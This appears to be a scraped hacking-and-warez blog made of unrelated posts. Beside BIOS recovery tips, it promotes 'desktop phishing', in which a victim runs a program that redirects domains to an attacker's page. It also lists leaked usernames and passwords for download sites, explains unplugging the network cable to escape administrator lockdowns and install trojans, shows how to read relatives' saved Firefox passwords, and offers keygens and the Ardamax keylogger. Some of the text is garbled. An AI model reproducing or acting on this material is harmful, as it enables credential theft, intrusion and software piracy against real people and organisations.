But to avoid further damage to your chip if you're not sure which are the correct pins to short, measure the potential between the 2 pins by a voltmeter while the system is on. If the voltage reading is zero (or no potential at all), it is safe to short these pins.

But do not short the pins while the system is on. Instead, power down then do the short, then power up while still shorting. And as soon as you hear 3 beeps (1 long, 2 short), remove the short at once so that automatic reflashing from Drive A can proceed without errors (assuming you had autoexec.bat in it).

About how to do the shorting, the tip of a screwdriver would do. But with such minute pins on the PLCC chip, I'm pretty comfortable doing it with the tip of my multi-tester or voltmeter probe. Short the pins at the point where they come out of the chip.


AMIBIOS Recovery bootblock:

* Copy a known working BIOS image for your board to a floppy and rename it to AMIBOOT.ROM.
* Insert the floppy in your system's floppydrive.
* Power on the system while holding CTRL+Home keys. Release the keys when you hear a beep and/or see the floppy light coming on.
* Just wait until you hear 4 beeps. When 4 beeps are heard the reprogramming of the System Block BIOS went succesfull, so then you may restart your system.

Some alternative keys that can be used to force BIOS update (only the System Block will be updated so it's quite safe):

* CTRL+Home= restore missing code into system block and clear CMOS when programming went ok.
* CTRL+Page Up= restore missing code into system block and clear CMOS or DMI when programming went ok.
* CTRL+Page Down= restore missing code into system block and do not clear CMOS and DMI area when programming went ok.

Btw: the alternative keys work only with AMIBIOS 7 or higher (so for example an AMI 6.26 BIOS can be only recovered by using CTRL+Home keys).

120+ sites to watch TV and movies online

Wednesday, August 26, 2009

This summary is not available. Please click here to view the post.

Desktop Phishing -by Zeri Thunder

Desktop Phishing
we thank Zero Thunder for desgning such a wonderfull n complete tute on this topic

Code:
http://www.mediafire.com/download.php?zog4z0mgzmd

What is Desktop Phishing

This is a very advance way of Phishing. a lot different than the common way of Phishing. In the common way of phishing you can't get the real domain for an example: http://www.phishier.freehost.com but in Desktop Phisher you can get the http://www.phisher.com.

Old way of Phishing = http://www.paypal.freehost.com
Desktop Phishing = http://www.paypal.com

Whats Deference between
Phishing and Desktop Phishing

What is a Phisher Arm
Phisher Arm is programme that will change your IP Mapping Settings, Youdon't need to know a programme any programming laguage for this . you can make a Phisherarm with some tools you have in your computer

How DeskTop Phisher Works

Desktop Phisher need a Phisher Arm to get the victom to the phisher page . whenvictim run the phisher arm it will change the IP mapping on ur system it will add the attackers IPto the domain you made a phisher. When he type the domain it will locate to the phisher host uhave with.

Premium account

Following are the list of usernames and passwords of the premium accounts for Best downloads sites.

…!! ENJOY !!…

!!…100% Working Accounts…!!1.) www.divxcrawler.com {download movies fastly}Username : divx273 Password : 83427292.)

www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}Username : cinemanetwork20 Password : butterfly203.)

www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}Username : lo886Ees Password : zAgt88er4.)

www.sharingzone.net {movies, Pc softwares, Pc Games}Username : LODMQYHX Password : 375021402
www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}Username : ga20me Password : ke01feb6.)

www.watchdirect.tv {movies, music, Pc Games, online Tv}Username : cinemanetwork20 Password : butterfly207.)

www.fulldownloads.us {Greatly Every thing}Username : Af872HskL Password : XjsdH28N9.)

www.pirateaccess.com {Every thing}Username : yourfrienddalat@gmail.com
Password : CHh5LKPI Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt Username : mubashar_siddique@yahoo.com

Password : F9Gzgwb510.) www.warezquality.com {Every thing}Username : ageg2020

Password : z8fsDfg311.) wwww.warezreleases.com {All Stuff}Username : HnRPxKQz

Password : a59KBV7 Username : a25bipZP

Password : 1TeVnoJb Username : SHYyJfWU

Password : P4K20uO12.) www.fulldownloadaccess.com {All Stuff}Username : mpuv3y
Password : ykbcKTNSUsername : AL3429355
Password : RCHAbhKMUsername : AL3429350
Password : gMZNFcySUsername : AL3429351
Password : cTAkWAxcUsername : AL3429352


Password : ykbcKTNS14) www.gamedownloadnow.com {All Stuff}Username : ga20me

Password : ke01feb16.) www.tvadvanced.com {online Tv}Username : mv03dlPassword : frmvdl

Gain Admin privilage- good 4 uni students (sliit ppl watch it)

This works on WIn 2000 & WIN XP.
I will teach u how we can gain access to the website you want to
for free, and how you can gain access to 'control panel', and the various
other tools of Widows that may have been blocked from your grasp like 'regedit'.
When u are at the log on screen, type in your username and
password. NOW When you hit enter, and it comes up with
the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.
Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no
network access. But that's cool because now we can access 'Internet options',
click in the 'connections' tab click the LAN settings, click the proxy
settings, and in the little white box at the bottom we can specify websites
that bypass the proxy server (eg www.yahoo.com) Now once you have changed
the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the
internet settings you specified.
This is just an 'Unplugging technique' to gain access to a comp. locked by the administrator.Now you can gain access to msconfig, regedit, command etc disable the virus scanner, u can install a trogan or a virus according to u're will.
And now there is nothing the administrator can do about this.

How to Access Banned Websites

Surfing at school? Parents enabled website blocking? Stuck behind a strict firewall? There are lots of ways around the problem so that you can get to the sites you want to see without those cybernannies tying your hands…phproxy is “dedicated to bringing you fast web browsing from behind web filters”. Simply tap in the URL of that banned site you really must see, it could be Facebook, MySpace, Youtube, or a renegade blogger behind enemy lines, and you will be able to access it with no problems. More seriously, the proxy allows you to visit a site anonymously because it is the proxy itself that is visiting the banned site not you, and so keeps your browsing hidden from prying eyes allowing you to protect your online identity.
Such a proxy also allows you to visit sites that have banned your IP. This might be a forum or just a website or blog from which you or other users on your IP range (whether on your school or company network or your ISP account) have been barred access. The proxy server is an open gateway between your web destination and you.
Other proxies exist, such as www.the-cloak.com (please make sure you include the hyphen in that URL or you will be in for a shock),
More on an additional approach (Psiphon) here – http://en.wikipedia.org/wiki/Psiphon
Of course, we should add a disclaimer at this point, please don’t use proxies or anonymizers to break the law or to cause malice and please don’t abuse the service as they are usually free.

Speed Up Ur PC 70% More faster !


Speedup You Pc 70% - For more of the funniest videos, click here








To download the program
CLICK HERE

The Pentagon hacker - Gary McKinnon


Gary McKinnon is a British Hacker who hacked several United States Government Agencies like NASA, Department of Defense and the navy. He is facing extradition to the United States for what they (the prosecutor) calls the "biggest military computer hack of all time" He is accused of actually damaging 79 computers what makes a total of 700.000 dollars of damage.
While exploring these systems he came across interesting “proof” of extraterrestrial life and UFO cover-ups by NASA. While he was Remote Desk-toping a computer in a department of NASA where they apparently “photoshop” pictures from outer space in order to brush out the flying objects and extraterrestrial ruins of buildings.
You can download and listen to the BBC radio interview
here.
Watch Vedio Interview With Gary McKinnon

Get all passwords from firefox

Hello , today im gonna show you how to get all the password , your brother , your sister , or that friend of yours that came on over and logged onto facebook.
This is extremely easily.
Step 1. Open up firefox.
Step 2. Go into the "tools" tab
Step 3. Click on "Option"
Step 4. Go to the Security tab , and Click on Saved passwords.
Final step 5. Click on Show passwords.
How to avoid this being used on you
Go to the Security Tab and Set a master password
Thank you

3 Firefox Tips You May Not Know About

The thing I like best about Firefox is that just when you think you know everything there is to know about the browser, something new comes along and surprises you.

I discovered five new Firefox tips today. Maybe these are old hat and you know them already. Or maybe like me, you had no idea these could be done.

1. Delete visited URL’s
When you drop down the box underneath the address bar, you can see your recent browsing history. But what if you want to remove one URL from that list? Maybe you’ve been looking at a naughty site and you don’t want your girfriend to know? Or maybe you’ve been shopping for your loved one online and you want to keep it a secret?
Just drop down the URL box, highlight the URL you want to zap then press the “delete” button on your keyboard. The URL will then be removed from the list.

2. Navigate to browser tabs using the keyboard
Instead of using the mouse to click on a tab, why not use the keyboard instead? Pressing CTRL + TAB together will bounce you from tab to tab, starting from the one in the far left and working its way along. Or if you want to go to a specifc tab straight away, you can do that too. CTRL + 2 will take you directly to the second tab from the left. CTRL + 5 will take you to the fifth tab from the left.

3. Grab files off webpages, even protected webpages
Have you ever wanted a picture, file or video off a webpage but you can’t, because it’s been protected? Just right-click on the page, choose “View Page Info” then the “media” tab. Find the file you’re looking for from the list and click on “save”. (note : this doesn’t work for everything but I have still had a pretty high success rate nonetheless).

Change your IP ADDRESS using a simple trick.. This trick is only for BSNL BROADBAND users..

1.) First type 192.168.1.1 in your address bar and press enter. You will get a pop-up as shown in the preview asking for username and password.
If you are using bsnl broadband connection via Ethernet cable then 192.168.1.1 and if you are using bsnl broadband via USB cable then 192.128.1.2.. Rest all procedure is same for both..
Type the username: admin and password : admin. Its common for all and incase if ur service provider is using something different then ask them for the same.. Then press OK..



2.) Click on "WAN" from the list of options..

3.) Here under PPPoE/PPPoA and in AUTHENTICATION first keep the option "PAP" anc click on APPLY and check whether your ip address is changed or not.. If its not changed then select the option "CHAP" and click on APPLY. Do this untill IP ADDRESS CHANGES.. Usually two or three times will do the work for you..


4.) Keep refreshing the Rapidshare site to check whether the IP ADDRESS is changed or not. RAPIDSHARE tracks your IP ADDRESS when u download a file and when you start to download another file it asks to purchase PREMIUM account. So if you change the IP ADDRESS it wont recognize your previous download and you can download as many times you change your IP ADDRESS. If you successfully change your IP ADDRESS then u can download as much as you want from RAPIDSHARE... One of the biggest and fastest one-click file hosts in the world. There are many other methods also to change the Ip Address and Download unlimited from Rapidshare.. This is a simple trick i accidently discovered!!

All in one KeyGen


Adobe Acrobat 3D 8.1

Adobe Acrobat 8.0 Professional

Adobe After Effects CS3

Adobe Audition 2.0

Adobe Captivate 3.0

Adobe ColdFusion 8.0

Adobe Contribute CS3

Adobe CS3 Design Premium

Adobe CS3 Web Premium

Adobe Dreamweaver CS3

Adobe Dreamweaver CS3

Adobe Encore DVD 2.0

Adobe Fireworks CS3

Adobe Fireworks CS3

Adobe Flash CS3

Adobe Flex Builder 2.0

Adobe FrameMaker 8.0

Adobe GoLive CS3

Adobe Graphics Server 2.1

Adobe InCopy CS3

Adobe InDesign CS3

Adobe LiveCycle Designer 7.1

Adobe OnLocation CS3

Adobe PageMaker 7.0

Adobe Photoshop CS3 Extended

Adobe Photoshop Elements 5.0

Adobe Photoshop Lightroom 1.1

Adobe Premiere Pro CS3

Adobe RoboHelp 6.0

Adobe Soundbooth CS3

Autodesk 3ds Max 9 32-bit

CompuPic Pro

CyberLink Power2Go 5.5

CyberLink PowerCinema 4.0

CyberLink PowerDirector 6.0

CyberLink Power

DVDCyberLinkPowerDVD Copy 1.0

CyberLink PowerEncoder MPEG-4 AVC 1.0

DivX for Windows 6.6

Inivis AC3D 6.1

Intervideo Disc Master 2.5

PlatinumIntervideo DVD Copy 5.0

PlatinumIntervideo Home Theater 2.5

PlatinumIntervideo Instant Movie Maker 1.0

Intervideo iVideoToGo IPOD 4.5

Intervideo iVideoToGo PSP 4.5

Intervideo MediaOne 1.0

Intervideo MediaOne Gallery 2.0

PlatinumIntervideo WinDVD 8.0

PlatinumIntervideo WinDVD Creator 3.0

PlatinumIntervideo WinDVD Media Center 3.2

Intervideo WinDVD Recorder 5.2

PlatinumIntervideo WinDVR 3.0

Macromedia Authorware 7

Macromedia ColdFusion MX 7.0

EnterpriseMacromedia Director MX 2004

Macromedia Freehand MX 11

Macromedia HomeSite 5.5

Macromedia JRun 4.0

mIRC

Photodex ProShow

Steganos Security Suite 2007

Symantec Norton 360

Symantec Norton Ghost 12.0

TechSmith EnSharpen

TechSmith Products (camtasia etc...)

TuneUp Utilities 2007

WinZip 11.1

WinZip Self-Extractor 3.1

ZoneLabs Products (zone alarm , zone alarm whit spyware, whit antivirus etc.....)

Click below to download the softwareDownload

ARDAMAX KEYLOGGER-(THE BEST ONE)

FRIENDS ...IF U DON'T KNOW ...WHAT IS KEY LOGGER....?I WILL EXPLAIN OK.




KEY LOGGER MEANS:-




JUST ...WHAT U TYPE IN KEYBOARD...LIKE WEBSITE NAME,USER NAME,PASSWORDS ANY ONE...IT CATCHES...PERFECTLY




IT LOOK LIKE BELOW AFTER INSTALLATION







JUST INSTALL THEN..AFTER INSTALLATION.TYPE ANY THING LIKE OPEN ANY WEBSITE ENTER MAIL AND PASSWORDS, ANY THING ..



THEN OPEN UR ...ARDAMAX KEY LOGGER HO U R DEFINITELY SHOCKED..STILL NOT UNDERSTAND MAIL ME FIND MY MAIL BOTTOM OF THIS PAGE.
DOWNLOAD HERE

Key Gen for Nero 9



Nero 9

Nero 9 HD

Move It

Back It Up

Media Home

Grace Note Plug In

Blue Ray Video Plug In

Blue Ray Disc Authoring Plug In

DTS Plug In (Extra)

mp3 Pro Plug In (Extra)

SecurDisc Viewer (Extra)

Nero IN Cd Reader (Extra)

BlueRay HD/DVD Plug In (Extra)
Download